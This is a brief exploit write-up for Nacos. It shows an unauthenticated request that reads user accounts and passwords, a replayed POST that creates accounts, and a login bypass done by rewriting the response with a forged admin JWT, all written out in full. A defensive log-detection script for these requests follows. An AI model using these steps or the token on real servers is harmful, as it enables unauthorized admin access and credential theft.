Vulnerable endpoint: GET http://IP:PORT/nacos/v1/auth/users?pageNo=1&pageSize=9
Reads account names and passwords
Arbitrary account creation
POST http://IP:PORT/nacos/v1/auth/users?username=test1&password=test1
Intercept the request, change the method from GET to POST, and replay it
The account has been created
Unauthorized access to the admin console
Enter any password, intercept with Burp Suite and modify the response packet to bypass the login and enter the console
Modify the response to the following:
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}
Successfully entered the admin console
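From the defender's side, the two server-visible steps above are the unauthenticated GET that lists accounts and the POST that creates one, both against /nacos/v1/auth/users; the response-tampering step happens inside the attacker's proxy and leaves no distinctive server-side trace beyond the login attempt. The following Python script is an added example, not part of the original write-up or of the Nacos project, that runs simple detection logic over reverse-proxy access-log lines in the common combined format. The log lines, the IP addresses and the admin allowlist are constructed for illustration; a successful (2xx) request to the users endpoint is flagged as a read or a creation, with an extra alert when the password travels in the URL query string, and another when the source address is not on the operator's allowlist of admin hosts.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (nginx/Apache combined format) for a
# reverse proxy in front of a Nacos server. Not taken from any real system.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Nov/2022:01:25:01 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 512 "-" "curl/7.81.0"
10.0.0.5 - - [10/Nov/2022:01:25:07 +0000] "POST /nacos/v1/auth/users?username=test1&password=test1 HTTP/1.1" 200 27 "-" "curl/7.81.0"
10.0.0.9 - - [10/Nov/2022:01:26:10 +0000] "POST /nacos/v1/auth/login HTTP/1.1" 403 31 "-" "Mozilla/5.0"
192.168.1.20 - - [10/Nov/2022:01:27:16 +0000] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 210 "-" "Java/11"
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# The endpoint from the write-up above; it should never answer an unauthenticated caller.
SENSITIVE_PATH = "/nacos/v1/auth/users"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # Keep only the first value of each query parameter; enough for detection.
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    rec["status"] = int(rec["status"])
    return rec


def classify(rec, admin_allowlist=frozenset()):
    """Return the list of alert strings for one parsed request; empty means benign."""
    alerts = []
    # Only successful calls to the user-management endpoint are interesting here.
    if rec["path"] != SENSITIVE_PATH or not 200 <= rec["status"] < 300:
        return alerts
    if rec["method"] == "GET":
        alerts.append("user-list read")
    elif rec["method"] == "POST":
        alerts.append("user creation")
        if "password" in rec["query"]:
            alerts.append("credential in URL query")
    # Hypothetical operator policy: only allowlisted admin hosts may manage users.
    if rec["ip"] not in admin_allowlist:
        alerts.append("source not in admin allowlist")
    return alerts


def scan(log_text, admin_allowlist=frozenset()):
    """Scan a whole log and return (ip, method, path, alerts) for every flagged request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        alerts = classify(rec, admin_allowlist)
        if alerts:
            findings.append((rec["ip"], rec["method"], rec["path"], alerts))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, admin_allowlist={"192.168.1.20"}):
        print(finding)
```

Run against the constructed sample, the scan reports the two requests from 10.0.0.5 and stays silent on the failed login and the ordinary service lookup. In production the same logic would be pointed at the proxy's real log file and the allowlist populated with the hosts that are actually permitted to administer Nacos.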